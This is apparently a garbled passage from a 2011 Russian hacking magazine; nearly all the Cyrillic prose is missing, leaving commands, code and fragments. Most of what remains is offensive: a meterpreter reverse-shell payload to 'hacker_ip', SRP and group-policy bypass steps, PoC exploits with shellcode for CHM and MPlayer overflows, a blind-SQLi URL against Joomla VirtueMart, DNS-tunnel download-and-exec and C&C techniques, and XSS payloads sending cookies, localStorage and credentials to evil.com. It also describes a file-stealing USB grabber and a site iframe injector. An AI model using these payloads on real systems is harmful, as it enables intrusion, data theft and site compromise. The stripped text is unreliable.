msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread
LPORT=4444 LHOST=hacker_ip R | msfencode -a x86 -e x86/
alpha_mixed -t raw BufferRegister=EAX > payload.txt
2. meterpreter :
msfcli multi/handler PAYLOAD=windows/meterpreter/
reverse_tcp EXITFUNC=thread LPORT=4444 LHOST= hacker_ip E
3. -
Type payload.txt > shellcodeexec.exe
4. -

. . -,
- shellcodeexe,
. -, - ( , , ),
, , . ?
- RWX-. , ,
, . , .
,
- , ,
. , , . shellcodeexe
, .

.
.
Software Restriction Policies (SRP).
Windows Program Files.
? :
Read Execute, -
, .
- , .
, SRP
, .
(. ). . ?
, :). .
, , ,
,
, .
.
.
1. - .
X 06 /149/ 2011

DVD
dvd


DVD.


2. .
3. .
4. -.

( , , ) , ,
.
, ,
.
, cached
domain credentials ( ). , . ,
.
. , ?
.
. ,
: Vista, 7-. ,
- , ,
. :).
. , -, (explorer.
exe, ) ( )
/ SRP.
, . . -,
() .
. explorer.exe ()
Windows. /,
(execute). explorer.exe,
,
.
, , .
OllyDbg ,
, .
, , ,
X 06 /149/ 2011

,
- . - :).
, . , SRP, , , . :
1. -,
().
2. dll-,
dll-.
3. -
( ).
4.
.
5. dll
, .
6. , , ,
, .

,
.
: goo.gl/BDIQt. (gpdisable.zip), ,
Microsoft -, , -,
, -, , -, .
, GPCul8or .
. . :
Gpdisable.exe c:\windows\explorer.exe

HKLM\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_
DLLs,
. .

.
goo.gl/ucrhQ, , 100% .
, . z

041


iv (ivinside.blogspot.com)
pikofarad

. ,
:
CVSS v2 Base Score
.

01

SQL JOOMLA! COM_


VIRTUEMART

CVSSV2
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
CMS Joomla .
-
Virtuemart. Stratsec SQL .
-.
EXPLOIT
'com_virtuemart/classes/ps_module.php' get_dir(), 255-270:
function get_dir($basename)
{
$datab = new ps_DB;
$results = array();
$q = "SELECT module_perms FROM #__{vm}_module where
module_name='".$basename."'";
$datab->query($q);
if ($datab->next_record()) {
$results[ 'perms' ] = $datab->f("module_perms");
return $results;
}
else {
return false;
}
}

, . $basename . ,

042

, e GET-
page, 'com_virtuemart/virtuemart_parser.
php', 189-210:
if( $option == "com_virtuemart" ) {
if (empty($page)) {// default page
if (defined('_VM_IS_BACKEND')) {
$page = "store.index";
{
else {
$page = HOMEPAGE;
}
}
// Let's check if the user is allowed to view the page
// if not, $page is set to ERROR_PAGE
$pagePermissionsOK = $ps_module->checkModulePermissions(
$page );

checkModulePermissions()
'com_virtuemart/classes/ps_module.php'
page. get_dir(),
:
function checkModulePermissions( $calledPage ) {
global $page, $VM_LANG, $error_type, $vmLogger, $perm;
// "shop.browse" => module: shop, page: browse
$my_page= explode ( '.', $page );
if( empty( $my_page[1] )) {
return false;
}
$modulename = $my_page[0];
$pagename = $my_page[1];
$dir_list = $this->get_dir($modulename);

:
1. , ( ).
X 06 /149/ 2011


chm- hex-
2. Joomla '<' '>' ,
'=' .
.
,
, . ,
MySQL 5 ,
30-60 :
http://[target]/[path]/index.php?option=com_virtuemart&
page=-1'+union+select+if(substring(@@version,1,1)=5,
benchmark(30000000,MD5('x')),null)--+fakemodule.
fakepage

benchmark(count, expr),
(count) ,
( MD5
'x'). ,
'substring(@@version,1,1)=5' . ,
@@version 5. MySQL
4- , , 4 5.
,
. :
exploit-db.com, ID 17132.
: ./17132.py [<>] -t [:] -d
[_]
: ./17132.py -p localhost:8080 -t
192.168.1.7 -d /webapps/joomla/

-,
'-p',
:.
,
.
- ,
- -.

, e . , ,
, ,
mr_me, .
doBlindSqlInjection(). ,
X 06 /149/ 2011

, ,
163-176.
TARGETS
Joomla! com_virtuemart <= v1.1.7
SOLUTION
com_virtuemart 1.1.8 1.1.7.

02


VLC MEDIA PLAYER

CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
, ,
OllyDbg, VLC Media Player
AMV NSV. .
Dangling Pointer, ,
2007 Black Hat USA
(whitepaper ). libdirectx_plugin.dll 0x41-,
90. Internet Explorer
AMV,
IE.
EXPLOIT
26 Metasploit Framework
exploit/windows/browser/vlc_amv. :
#
$ msfconsole
#
use exploit/windows/browser/vlc_amv
# (
)
set PAYLOAD windows/exec
# ()
set CMD calc.exe
# (Windows XP SP3 IE6)
set TARGET 1
# ( process )

043

chm-
set EXITFUNC seh
# -!
exploit

, show
options, show payloads, show targets. ,
. exploit
- , .
TARGETS
VLC Media Player <= 1.1.7.

, Metasploit
Framework :
Windows XP SP3 + IE6;
Windows XP SP3 + IE7;
Windows Vista + IE7.
SOLUTION
1.1.8, .

03


MICROSOFT HTML HELP <= 6.1

CVSSV2
7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
: HTMLHelp (Microsoft
Compressed HTML Help, Microsoft Compiled HTML Help, .CHM) ,
Microsoft 1997
WinHelp. HTML-,
,
,
. .CHM LZX.
.CHM- ,
Microsoft Windows, Windows
98, Windows NT. , , FBReader . .CHM-
Microsoft HTML Help
Workshop, Htm2Chm, Total Commandera,
.

044

,
l_memmove_call
EXPLOIT
itss.dll, hh.exe (, Microsoft HTML Help)
chm-, .
,
, .
(WinXP SP3):
.text:6638B251 8B 87 28 01 00 00
mov
.text:6638B257 03 45 0C
add
.text:6638B25A 56
ush
; - ,
.text:6638B25B 50
push
; ()
.text:6638B25C FF 75 08
push
; ,
.text:6638B25F E8 0B CC FE FF
call
; memmove (memcpy ) <--- Stack

eax, [edi+128h]
eax, [ebp+arg_4]
esi
eax
[ebp+Dst]
l_memmove_call
overflow

, ,
,
, chm-.
,
/#WINDOWS ( 0 , ,
).
call 0x3ff7
0xb9b58 0x7f998,
, , .
, l_memmove_call
( memmove memcpy win7)

itss.dll,
...
chm- :
HTML Help Workshop;
HTML Help Workshop,
;
HTML Help table of
X 06 /149/ 2011

MPlayer Lite 33064

: pop,pop,ret
SEH-
profit.
test.hhc:
<HTML><BODY><UL><LI><OBJECT type="text/sitemap">
<param name="Name" value="test">
<param name="Local" value="test.htm">
</OBJECT></UL></BODY></HTML>

test.htm:
<HTML>
<BODY>
<img src="poc.gif">
</BODY>
</HTML>

strcpy
contents (.hhc) HTML files (.htm);
test.hhc, test.htm;
Add/Modify window definitions,
- ;
chm- (File Compile);
chm- hex-;
/#WINDOWS;
0x01, 3- 3-
0x00 0xff 0x7f;

, ,
3- ,
. ,
EIP , EIP
, 0x7fffffff.
16- (destination + 0x1c8),
, .
, ,
,
poc.gif. ,

X 06 /149/ 2011

045


- MSF
.
: .
import sys
begin_of_gif = "\x47\x49\x46\x38\x39\x61\xD8\x00\xD8" +
"\x00\xD5\xFF\x00" + "\x90" * 6
#
nextSEHoverwrite = "\xeb\x06\x90\x90"
# , ;
#
# pop, pop, ret
SEHoverwrite = "\x81\x81\x81\x81"
nopsled = "\x90"*0x1e5
# win32_exec EXITFUNC=process CMD=calc.exe Size=164
Encoder=PexFnstenvSub
# http://metasploit.com
payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4'
payload += '\x5b\x81\x73\x13\x6f\x02\xb1\x0e\x83\xeb\xfc'
payload += '\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b\x53'
payload += '\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51'
payload += '\x4f\x03\x5a\x47\xe4\x36\x3a\x0f\x81\x33\x71'
payload += '\x97\xc3\x86\x71\x7a\x68\xc3\x7b\x03\x6e\xc0'
payload += '\x5a\xfa\x54\x56\x95\x0a\x1a\xe7\x3a\x51\x4b'
payload += '\x03\x5a\x68\xe4\x0e\xfa\x85\x30\x1e\xb0\xe5'
payload += '\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a\x6b\xc1\x80'
payload += '\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42'
payload += '\xbd\x85\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4'
payload += '\x82\x01\x0e\x6f\x02\x3a\x66\x53\x5d\x80\xf8'

046

Google 230 000 000


com_virtuemart
payload += '\x0f\x54\x38\xf6\xec\xc2\xca\x5e\x07\x7c\x69'
payload += '\xec\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61'
payload += '\xd0\x62\x0c\x2c\xd4\x76\x0a\x02\xb1\x0e'
new_gif = open("poc.gif", "wb")
new_gif.write(begin_of_gif +
nextSEHoverwrite +
SEHoverwrite +
nopsled +
payload +
"\xcc"*0x1000)

TARGETS
Windows ( , Windows 7).
SOLUTION
.
X 06 /149/ 2011

Joomla! com_virtuemart

04


MPLAYER LITE 33064 (SEH)

CVSSV2
6.9 (AV:L/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
Mplayer WW Windows
mplayer, (MPEG/
VOB, AVI, Ogg/OGM, VIVO, ASF/WMA/WMV, QT/MOV/MP4, RealMedia,
Matroska, NUT, NuppelVideo, FLI, YUV4MPEG, FILM, RoQ, PVA), , XAnim Win32 DLL .
Mplayer VideoCD,
SVCD, DVD, 3ivx, DivX 3/4/5, WMV H.264.
MPlayer
. X11, Xv,
DGA, OpenGL, SVGAlib, fbdev, AAlib, DirectFB, VESA ( VESA , X11)
( Matrox, 3Dfx ATI),
GGI, SDL ( ).
,
.
MPlayer MPEG, Siemens DVB, DXR2 DXR3/Hollywood+.
19 2011 C4SS!0 h1ch4m ,
mplayer ww m3u-.
.
EXPLOIT
m3u-, mplayer, strcpy, , 0xbc8008,
0x22ebb8.
.
:
0056173E C78424 78040000> MOV DWORD PTR SS:[ESP+478],8D48E0
; ASCII "*.rar"
00561749 C78424 7C040000> MOV DWORD PTR SS:[ESP+47C],0
00561754 895C24 04
MOV DWORD PTR SS:[ESP+4],EBX
00561758 890424
MOV DWORD PTR SS:[ESP],EAX
0056175B E8 A8032900
CALL 007F1B08
; <JMP.&msvcrt.strcpy> <--- Stack overflow
00561760 8D9424 68020000 LEA EDX,DWORD PTR SS:[ESP+268]
00561767 C74424 04 2F000> MOV DWORD PTR SS:[ESP+4],2F

SEH-.
X 06 /149/ 2011

, , SEH-
pop pop ret, Next SEH.
nop- (nopsled),
\xE9\xD4\xEB\
xFF\xFF, nop-,
.
,
. ,
.
POC-:
my $buf
$buf .=
$buf .=
$buf .=

= "\x90" x 100;
$payload;
"\x41" x (5152-length($buf));
"\xeb\x0f\xcc\xcc"; # Next SEH

# pop pop ret (SEH)


# avcodec-52.dll, mplayer
lite 33064
$buf .= pack('V', 0x6B04FCDE);
$buf .= "\x90" x 15;
$buf .= "\xE9\xD4\xEB\xFF\xFF";
$buf .= "\x90" x 400;

TARGETS
Mplayer Lite 33064
SOLUTION
, m3u-,
. z

047


, Digital Security (twitter.com/asintsov)

DNS:

payload


, , ,
.
.
Previously on ][

, , ,
-,
. -
Metasploit, ,
DNS .
, ,
DNS-,
, (
). DNS-
. , ,
- - .
.

:
1. . - ,
DNS- _popen. ,
(data_data_data): _popen(nslookup
data_data_data.domen.ru,r). , , , .

048

2. msvctrl.dll. -
msvctrl, . , -
.
3. . - . ,
, .
, .
4. ,
.
5. , -
.
, , , .

, ? , , ,

.
- . ,
, C&C
DNS-. , , Acrobat
Reader , , ,
X 06 /149/ 2011

:
DNS-

:)

DNS

DNS-


DNS

DNS
-.
download&exec-.
HTTP, DNS,
.
, , , DNS.

, -,
. , kernel32.dll, . -
LoadLibrary
GetProcAddr. ,
.
: _popen (
),
WinExec,
. . _popen, nslookup ( ). WinExec
, CreateProcess .
WS2_32.dll getaddrinfo.
IP- .
-
(Acrobat Reader, ). DNS-
svchost.exe, UAC .
, WIN API :). , ,
X 06 /149/ 2011

: ?
IP-.

,
14 , 17 .
: aaaa, baaa,
caaa .
17x14 . , DNS 238 (0xEE) . 17 14?
, IPv6-,
16 , 17 .
. ,
- getaddrinfo (aaaa.domain.ru)
17 IP-. -
, .
,
( 14 , ), 14 . . -
,
14 17 . 29 010203040506..272829:
000e:0102:0304:0506:0708:0910:1112:1314
0e0e:1516:1718:1920:2122:2324:2526:2728
1c01:2900:0000:0000:0000:0000:0000:0000

238 , , . ,
%TEMP%-, ( -).
- 238 (baaa.domain.ru)
. ,
.
WinExec .
- . , -
Windows 7 x64 ( 32- !)
Windows XP SP2 x32, IPv6 .

049

DNS
,
! :
1. kernel32.dll.
2. GetProcAddr.
3. Loadlibrary.
4. WinExec,
gettaddrinfo, exit, fopen, fwrite, fclose .
5. .
6. , .
7. getaddrinfo.
8. aaaa.domain.ru, baaa.domain.ru
.
8.1 IP-,
.
8.2 .
9. .
10. .

, .
, N
C&C- .
. .
,
, .
, ,
, , :
sleep
exit
< >

-

cmd /s < >

(), - .
XR.[name1][name2].domain.ru. name1 , name2 .
.
, , -
- . : XG.[name1][name2].domain.ru.
, IP-, IPv4.
, ,
txt-, .
TXT , ,
IDS-,

050

IP- , . : 1.1.1.1
, , .
IP-, , (, 84 ,
-!). . , ipconfig.
. , , DNS-
+, / =, base64.
: XX.<N>.<base64>.domain.ru, <N>
( ,
). <N> FI.
, . ,
, .
, exe-
,
. . VBS,
. nslookup
. . , .

. ,
. .
.
, , ,
. ,
, sleep.
.
, . ,
, ,
. timeout,
. .
, <CTRL-C> .
, .
CTRL-C.


.
sleep.
, dnsBOT.
name1.name2.txt ( ),
. , CTRL-C.
X 06 /149/ 2011

-
:)

windows. , ( Acrobat Reader), .


:

, ,
, , :).

. :
, .
revdns.pl, 53 . :
$EGG="d:\\DROP.VBS";
$defaultcmd="ipconfig";
$DOMAIN="dom.com";
$IPA="127.0.0.1";

#
#
#
#




IP- DNS

, , DNS
: (,
) . : nslookup q=AAAA aaaa.dom.com
238 DROP.VBS.
, DROP.VBS:
DOMAIN="dom.com"

, -,
. . dnsdrop.rb
, c:\<MSF>\modules\payloads\singles\
X 06 /149/ 2011

set DOMAIN=dom.com
set FILE=vbs

PDF , .
, perl
. ,
.

.

, DNS . , PoC ,
DNS
, , , ! , - CONFidence 2011
DSecRG. , ,
][!
, ,
( /)

!
P.S.
, . z

051


(alumni.samara@gmail.com)

Cisco

,
VPN
? .


(VPN)
.
() ,
IP Ethernet. -, ,
- ,
. , ,
( ).

052

Ethernet
VLAN. , , -.
VLAN .
, Dynamips,
Cisco
Windows.
Cisco IOS (
).
X 06 /149/ 2011

idlepc get routername


Dynamips -: Dynagen GNS3
( Dynamips).
Dynagen (dynagen.org).
:
Dynagen Sample Labs
Cisco;
Dynamips Server ;
Network device list ,
( , );
Pemu Server Cisco PIX.

. Cisco IOS 7200,
Dynamips, , .
,
c3745-advipservicesk9-mz.124-15.T6.bin.
Dynagen ,
Cisco IOS, ,
7z rar,
.


DATA-

Dynagen *.net,
, .
,
:
# Simple Cisco 3745 with 2 real interfaces
autostart = False
[localhost]
[[3745]]
image = \Program Files\Dynamips\images\
c3745-advipservicesk9-mz.124-15.T6.bin
idlepc = 0x613f07b4
npe = npe-300
ram = 160
[[ROUTER R1]]
console = 2000
model = 3745
cnfg = configs\cisco_3745.cfg
slot1 = NM-16ESW
slot2 = PA-2FE-TX
F1/0 = NIO_gen_eth:\Device\
NPF_{7C94C2DF-C005-489D-9E50-3199AEFE6F27}
F2/1 = NIO_gen_eth:\Device\
NPF_{3209EAAB-22CD-453A-965A-D02490DB7EDE}
X 06 /149/ 2011

Network device list


, , .
[localhost] , Dynamips.
[[3745]] ,
. [localhost].
, ,
localhost. ,
Cisco 3745, .
image Cisco IOS
c3745-advipservicesk9-mz.124-15.T6.bin.
,
.
npe = npe-300
3745 Network Processing Engine 300.
ram = 160
160 .
, ,
,
,
, 256
.
idlepc = 0x613f07b4 ,
.
100%. ,
.
telnet , enable-,
.
Dynagen idlepc get routername (
idlepc get R1).
,
.
<Enter>. CPU
.
. idlepc show
routername ( idlepc show R1).
, ,
- . ,
,
.
[[ROUTER R1]] , . R1 , Dynamips, hostname
.
slot1 = NM-16ESW 1
NM-16ESW (FastEthernet 16 ),
.
slot2 = PA-2FE-TX 2
PA-2FE-TX (FastEthernet 2 ).
, , .
cnfg = configs\cisco_3745.cfg ,

INFO

info
Dynamips

PIX (Private Internet
Exchange).

,

VLAN ID
trunk.

Metasploit

STP spoof/cisco/
stp spoof/cisco/
pvstp.
VLANe,

VLAN, ,

.

053

trunk

trunk

Cisco

Metasploit Framework
,
, BGP (Border
Gateway Protocol, ),
FullView (), .

- Quagga.

. , , vk.com/club21939124
.
Dynamips Server,
3745_router.net (
). 2 :
Dynamips .
,
:
List ;
Start ;
Start /all ;
Start R1 R1 ( );
Stop ;
Stop /all ;
Stop R1 R1 ( );
Telnet ;
Telnet /all ;
Telnet R1 R1 ( ).
, Telnet, F1/0 access
port VLAN1 trunk port native VLAN1 VLAN2. ,
.

trunk DTP

(Dynamic Trunk Protocol)



. Cisco Catalyst
mode access, mode trunk,
DTP .
,
.

VLAN. , ,
VLAN,
.
,
-

054


. , Cisco
DTP,

.
Auxiliary/spoof/ciso/dtp (metasploit.com/
modules/auxiliary/spoof/cisco/dtp)
. -
RHOST IP-
RUN. IP- ? ,
WireShark.
VLAN 10,
, .
(, SW0, . ) -
,
, trunk Cisco.
D Cisco,
D-Link, D STP.

, DTP ,
,
xDSL FTTP,
STP D-Link
VLAN. STP
. ,
X 06 /149/ 2011

IP- WireShark

_Forge Cisco D Packets

Forge Spanning-Tree BPDUs


,
,
. ,
,

.
,
( ) STP
, c.
, ,
,
(, SW0 SW1 SW0 R1, . ).
BPDU metasploit-
Forge Spanning-Tree BPDUs,
.
SW0 SW1 ( SW0 R1) , . ,
? Ethernet-, X 06 /149/ 2011

,
ADSL-, .
, D
( ip), RUN, Metasploit .
MAC- .
, ! , , ,
, Windows XP,
: support.microsoft.com/kb/315236.
SW0 R1,
, WireShark.
R1,



.
, VLAN ,
.
Windows XP,
Cisco (
) , NM-16ESW.
,
Cisco,
.
, , 1 /, 100
/.
. , - , .

,
, , , .
, -
, . ,
,
, , . z

055


A X 330 D

(ax330d@gmail.com)

PHP-


-
, PHP. ,
!
. ,
,
,
PHP.

, , , ,
, ,
. - ,
.

-? . , ,

, , RIPS...
, ,

WinMerge. , , , -

056

?
, .
, ,
.
. , ,
, .
,
. ,
, -, PHP. - Zend,
PHP, . PHP, hello, world? ,
.
X 06 /149/ 2011

, Zend
Engine . , ,
PHP Extending and Embedding
PHP, ,
. - Advanced PHP Programming, ,
, . - PHP,
...
, PHP .
, , , ,
PHP. ,
.
, .
,
. PHP,
.
Zend Engine, : ,
. PHP mysql,
zlib, curl . SAPI
API, CLI, mod_php, fastcgi.
, ,
PHP.
,
, , . ,

, ,
. -. ,
. -
(op_array) zend_execute().
,
, .

JMP, CALL, SWITCH.
, ,
-.
,
. , APC, ,
, .
-. -,
,
Zend.

op_array.
, , , .
, , ,
_zend_op.
Zend/zend_compile.h
X 06 /149/ 2011

HTTP://WWW
links


PHP-

1. bytekit:
bytekit.org;
2. vld:
pecl.php.net/package/vld;
3.
evalhook:
goo.gl/UVq6y;
4. PHP:
php.net/manual/en/
internals2.php;
5.
Stefan Esser
PHP:
goo.gl/PtWdE;
6. DVWA: dvwa.co.uk.

:
struct _zend_op {
opcode_handler_t handler;
znode result;
znode op1;
znode op2;
ulong extended_value;
uint lineno;
zend_uchar opcode;
};

op1 op2,
, :
VAR ( $);
TMP , , ( ~);
CV , VAR ( !);
CONST , ,
;
UNUSED ;
result,
, VAR, TMP, CV.
,
0 153 (PHP 5.3.6), Zend/
zend_vm_opcodes.h.
, 116 131 .
, PHP
.
4 ,
5.1. . ,
5.1,
CV,
25 . ,
,
.
!n , ,

DVD
dvd

evalhook
.

057

vld
PHP $var.
, , (, html), PHP, :
<?php
$var = 1;
?>
<html>
...

PHP ECHO.
, ,
. , PHP .
, , echo(). ,
.

bytekit.
,
PHP 5.2.*. .
PHP 5.3. .
, PHP, 384 ,
(, scan_eval.php)
. , , ,

, , . , , . .
PHP Vulcan Logic Dumper (vld) bytekit. , , .

058

:
phpize
configure
make
make install

php.ini, :
extension=bytekit.so
extension=vld.so

, -d
extension=bytekit.so PHP. ,
.
,
bytekit ( bytedis) .

,
( *.dot)
Zynamics
BinNavi ( php2sql). ,
-
parsekit, , ,
segfault, . bytekit
, ZenGuard, ionCube.
,
, .
,

. ,
.
( )
X 06 /149/ 2011

PHP-
evalhook. ,
eval()
preg_replace() e, create_function(), assert().

, evalhook
, , , ,
.
zend_compile_string(), ,
. evalhook
Month Of PHP Bugs (
web).
evalhook ,
.
, - ,
.

.
, ,
- . ,
.
, :).

.
DVWA 1.0.7
, , SQL-
FI.
XDebug, .
dot,
. bytekit
, .
,
. examples,
:
php php2dot_simple.php /var/www/htdocs/h/dvwa/
vulnerabilities/sqli/source/low.php sqli-l

,
, . *.dot *.svg-. *.svg, *.dot
*.png :
dot -Tpng -o ./xxx.png xxx.dot

, . X 06 /149/ 2011

059

p
q
. ,
, . n.
? ,
-
PHP, . , ,
.
vld:
php -d extension=vld.so -dvld.active=1 /var/www/dvwa/
vulnerabilities/sqli/source/low.php

,
.
. , ,
main() C,
.
, SQL-.
? :
SQL- 9, 6.
~5 , ,
,
!0. ,
39, . ASSIGN
9 !1
~5. !0. ,
. o.

'Submit' $_GET, JMPZ
48 , 0, , .
, RETURN 1.
7 ,
-
$_GET. FETCH_R $2,
FETCH_DIM_R 'id'
$3. *_R read.
*_W write, , *_RW read/write,

060

. , ,
$3 ( PHP) !0. . SEND_VAR
,
, !1.
. , DO_FCALL mysql_query()
$7.
, ,
, -
.
, -
, . JMPNZ_EX. ?
xor ~9 $8.
, 0,
19 ( vld). ,
p.
. , ,
FREE ,
. ,
.
dvwa/
vulnerabilities/fi/index.php dvwa/vulnerabilities/fi/source/
medium.php.
. INCLUDE, REQUIRE,
. ,
REQUIRE_ONCE
, ~2.
.

. ~24 ~22 ~23.
. !1 . ,
q. , PHP
, :
X 06 /149/ 2011

$variable = 'low.php';

,
. .
, , ,
INCLUDE. , !2.
,
. ?
, ,
.
medium.php.
. ,
, !2.
!0, . ,
, ,
!0
str_replace(). . , ,
.
, index.php,
,
.
,
, ?
. DO_FCALL, DO_FCALL_
BY_NAME, INCLUDE_OR_EVAL, ECHO.
, , . ,
-, ,
,
.
, . ,
. .
? , SQL, , , ,
.
FETCH_R, FETCH_W
. ASSIGN
PHP. , ,
,
, .

, , . ,
,
IDA. PHP, ,
.
? , , , ,
. PHP,
, , .
,
. ,
:).
, PHP: bytekit
X 06 /149/ 2011

API, . examples/
FI:
php -d extension=bytekit.so bytekit-0.1.1/examples/
check_include.php index.php
index.php(30): require_once DVWA_WEB_PAGE_TO_ROOT.
"vulnerabilities/fi/source/{$vulnerabilityFile}";
index.php(35): include($file);

, eval:
/var/www$ php -d extension=bytekit.so bytekit-0.1.1/
examples/scan_eval.php ./
/var/www/dvwa/external/phpids/0.6/lib/IDS/vendors/
htmlpurifier/HTMLPurifier/VarParser/Native.php(17):
$result = eval("\$var = $expr;");
PHP Warning: bytekit_disassemble_file(): bytekit_get_next_
oplines: found throw outside of try/catch in /home/ams/
Desktop/bytekit-0.1.1/examples/scan_eval.php on line 19
/var/www/dvwa/external/phpids/0.6/lib/IDS/vendors/
htmlpurifier/HTMLPurifier/ConfigSchema/InterchangeBuilder.
php(140): return eval('return array('. $contents .');');

, - , , grep?
, -, , , .
, , ,
PHP. ,
, ,
.
, . , , .
,
, .
, ,
. , PHP ,
, .
,
. . . ,
,
.

, !

, , .
, , ,
,
.

, . , ,
PHP, :). z

061


(oxdef.info)

GOOGLE
CHROME

Google Chrome
. ,
.
, .
, Chrome.
Googles
Chrome Extensions Show Security Focus (bit.ly/hvYkqO). , ,
. Chrome,
Firefox, . , ,
. -: HTML
JavaScript, HTML5 CSS.
,
(
JavaScript).
.

062

:
manifest.json e
: , , , ;
HTML-,
background.html, ;
: JS-,
( UserJS Greasemonkey );
: e , , -.
e zip- crx.

DOM-.
, X 06 /149/ 2011


XSS .


.
API- ,
, , , , .
, , ,

.

XSS

( 18 368 ) Gmail Google Mail


Checker Plus (bit.ly/g5L6DT).
e ,
.
.

, .
. , ,
?
2"'><script src="http://evil.com/own.js">
</script>

own.js JavaScript- :
document.body.innerHTML = "";
img = new Image();
img.src = "http://evil.com/stallowned.jpg";
document.body.appendChild(img);

, :

XSS :
! ,
Lostmon e 2010 ,
e, :). , , :
All extensions runs over his origin and no have
way to altered data from extension or get sensitive
data like, email account or password etc..

,
:). , X 06 /149/ 2011

XSS-.

document.cookie

API. ( )

, :
{
"name": "My extension",
...
"permissions": [
"cookies",
"*://*.google.com"
],
...

HTTP://WWW
links

HTML5:
dev.w3.org/html5/
}
spec/Overview.html;
, ,
,
:

. code.google.com/
chrome/extensions/
XSS ,
index.html;

e . :
, microformats.org/
wiki/hcard.
:
chrome.cookies.getAll({}, function(cookies)
{
var dump = "COOKIES: ";
for (var i in cookies) {
dump += cookies[i].domain + ":"
+ cookies[i].name + ":"
+ cookies[i].value + " | ";
}
img = new Image();
img.src = "http://evil.com/stallowned.jpg?"
+ dump;
document.body.appendChild(img);
});

,
,
XSS. e (
)

063

XSS Google Mail Checker Plus


- HTML5. ,
, , 100%. ,
, e
:

XSS Google Mail Checker Plus


,
XSS -.
-, , API
. ,
XSS , .

XSS Gmail
. , . HTML/JavaScript , <IMG>,
. e
! , - ,
. ,
JavaScript-:
var dump = '';
var e = document.getElementsByTagName('a');
i=0;
while(i < e.length) {
if (e[i].className == 'openLink') {
dump += e[i].innerText + ' | ';
}
i++;
}
img = new Image();
img.src = 'http://evil.com/sniff.jpg?' + dump;
document.body.appendChild(img);

,
. e
,
(, , ), e .

064

var dump = ' LOCALSTORAGE: ';


for (i = 0; i < localStorage.length; i++ ) {
dump += "KEY: " + localStorage.key(i);
dump += " VALUE: " + localStorage.getItem(
localStorage.key(i)) + " | ";
}
img = new Image();
img.src = 'http://evil.com/sniff.jpg?' + dump;
document.body.appendChild(img);

,
,
API. ,
XSS- .
- !

e :
var msg = 'Please, enter account information.';
msg += '<form action="http://evil.com/login">Username:
<input type=text name=user>';
msg += ' <br>Password: <input type=password
name=pass><br><input type=submit></form>';
document.body.innerHTML = msg;

, .

,
JSON

JSON ,
- web 2.0
.
Chrome :
"name": "Extension",
"version": "1.0",
"description": "Some extension",
"icons": { "128": "icon.png" },
"permissions": ["http://example.com/"],
"browser_action": {
"default_title": "",
"default_icon": "pic.png",
X 06 /149/ 2011

Google
Mail Checker Plus
"default_popup": "view.html"
}
}

Microformats extension
, JSON:
1. JavaScript eval() (, ).
Google JSON
JSON.parse.
2. ,
JSON- JavaScript hijacking (bit.ly/eQDXrv)
JSON(P),
.

-. ,
e
-. .


( ][
Greasmonkey ). URL- html- <A>, ,
.
(content script) , , JavaScript,
, ,
, .
,
API-. ,
:
chrome.* APIs ( chrome.extension);
, ;
, ;
XMLHttpRequests.
,
. ,
:
1. ,
, !
2. .
e
.
X 06 /149/ 2011

HTML- hCard.
URL , , ,
:
<div class="vcard">
<div class="fn">James Bond</div>
<div class="org">MI-6</div>
<div class="tel">604-555-1234</div>
<a class="url" href="123:<script>d = document.
createElement('div');d.innerHTML='<h1>XSS</h1>';
document.body.appendChild(d);</script>233">
http://example.com/</a>
</div>

,
, ,
.
, ?
e? .

OAuth API- .

. , JQuery, !
$(".submithcard").click()


API , ,
.

? Google Chrome .
, (HTML, CSS
JavaScript) - , , XSS,
-.
XSS , XSS
-. Security
considerations ,
! z

065


(icq 884888, snipper.ru)

X-TOOLS
: Flash grabber
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Gar|k

: Charon v0.6 SE
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Rhino (project2025.com) &
v1ru$

.
bit.ly/fYIvbq.

: DIR-300 PWNER
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: TIMHOK


,

, ? Flash grabber.
:
,
. ,
.
-.
:
1. ;
2.
usb-;
3. ,
(
);
4. ,
,
;
5. ,
.
:
doc, docx,
ppt, pptx, rtf ;
(3.5 );
;

;
- ;
;
.


bit.ly/ew670z.

066

!
Charon.
,
v1ru$.
, Charon v0.6 SE ,
-
.
, ,
,
IP-,
- .
:

IP- , , ,
( );

-:
,
AngryIPScanner Superscanner;
- RBL;

-
;
HTTP (trans, anonim), ssl, socks4/5;
-;
GeoIP;
-



pwner
Dir-300.

, ,
2.05B03, 2.04,
2.01B1, 1.05B09, 1.05, 1.04, DIR-615 +
4.13B01 , ,
. .
pwner :
1. cmd;
2. ipconfig, IP;
3. IP,
( , IP 10.2.4.64,
10.2.4.0);
4. (, 10.2.4.255);
5. ( Dir-300, pwn
);
6. Go;
7. , .

X 06 /149/ 2011

.
IP .

admin
( ). .

:). , : bit.ly/gJEL38.

: Sharecash Survey
Helper
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: TickTack


Sharecash Survey Helper ,
. ,
- .

, .
: First name, Last
name, Address, City, State, Zip, Email, Birthday,
Phone. ,
Zip ,


. , .NET Framework 4.0.

bash Perl.
php/html. : ,
,
IE. ,
, .
,
html-.

, .
( ,
ftp) . Shadow
iframer .

: root
(,
)
nobody ( ,
).
: -.
index-
body.
:
# ./iframe.sh
[*]Searching for perl.../usr/bin/perl
[*]Starting index finder...please
wait...search complete. Found X pages
[*]Generating iframer...complete.
Starting iframer
[*] Injecting complete, deleting temp
files...
[*] Finished

: VkAksEnter
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: IOFFE


: http://bit.ly/ePt36Y.

: Antigate Balance
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Zdes Bil Ya

: Shadow iframer[local]
: *nix
: Gh0s7


antigate.com

, , -

X 06 /149/ 2011

Zdes Bil Ya. ,


antigate.com?
?
Antigate Balance.
, Antigate Balance

